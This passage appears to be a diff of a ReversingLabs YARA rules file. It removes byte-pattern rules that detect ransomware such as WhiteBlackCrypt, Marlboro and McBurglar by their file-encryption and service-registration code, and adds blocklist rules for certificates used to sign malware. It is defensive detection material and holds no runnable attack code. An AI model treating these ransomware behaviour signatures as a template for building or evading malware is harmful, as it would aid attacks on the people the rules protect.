-            ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28
-            ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ??
-            ?? ?? ?? DC 06 2A
-        }
-		$encrypt_files = {
-            16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E
-            5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ??
-            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ??
-            08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04
-            28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02
-            19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11
-            ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ??
-            2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WhiteBlackCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9855c10d-563d-54e0-bc79-945daef947de"
-		date = "2021-07-05"
-		modified = "2021-07-05"
+		id = "1c442ed6-a48a-52f4-b345-300428ec9c76"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13530-L13546"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WhiteBlackCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89
-            CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
-            15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2
-            AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8
-            ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ??
-            ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48
-            89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89
-            F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E
-            41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$encrypt_files = {
-            41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ??
-            48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41
-            B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ??
-            ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8
-            ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31
-            C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8
-            ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ??
-            ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9
-        }
-		$register_service_p1 = {
-            57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94
-            24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D
-            44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15
-            ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ??
-            ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B
-            4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ??
-            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ??
-            ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D
-        }
-		$register_service_p2 = {
-            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ??
-            48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D
-            54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ??
-            ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ??
-            ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ??
-            ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89
-            D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48
-            89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ??
-            8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $register_service_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DATALINE LTD." and pe.signatures [ i ] . serial == "20:2c:f8" and 1087841761 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Marlboro ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7cd3b436-47e3-5711-9b59-cef70efe3b45"
-		date = "2020-07-23"
-		modified = "2020-07-23"
+		id = "88679114-9c85-5810-af21-d5c2a8dc759e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13548-L13564"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Marlboro"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$ping_apnic = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
-            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server_connection_1 = {
-            BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
-            C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ??
-            50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-        }
-		$remote_server_connection_2 = {
-            84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6
-            45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B
-            01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0
-        }
-		$remote_server_connection_3 = {
-            50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49
-            ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F
-            43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ??
-            EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 FB ?? 72
-        }
-		$remote_server_connection_4 = {
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33
-            CD E8 ?? ?? ?? ?? 8B E5 5D
-        }
-		$encrypt_file = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ??
-            8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ??
-            8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39
-            41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ??
-            0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ??
-            8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45
-            ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
-            C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8
-            8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
-            45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
-            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ??
-            ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41
-            ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
-            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
-            ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF
-            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ??
-            ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures [ i ] . serial == "66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects McBurglar ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11816401-87c3-5aff-b161-da0fa4eb4bca"
-		date = "2021-09-27"
-		modified = "2021-09-27"
+		id = "a97723cb-7814-5f08-af94-6244c1cf4145"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13566-L13582"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "McBurglar"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ??
-            ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ??
-            ?? ?? 00 2A
-        }
-		$encrypt_files_p1 = {
-            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ??
-            7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
-            00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$encrypt_files_p2 = {
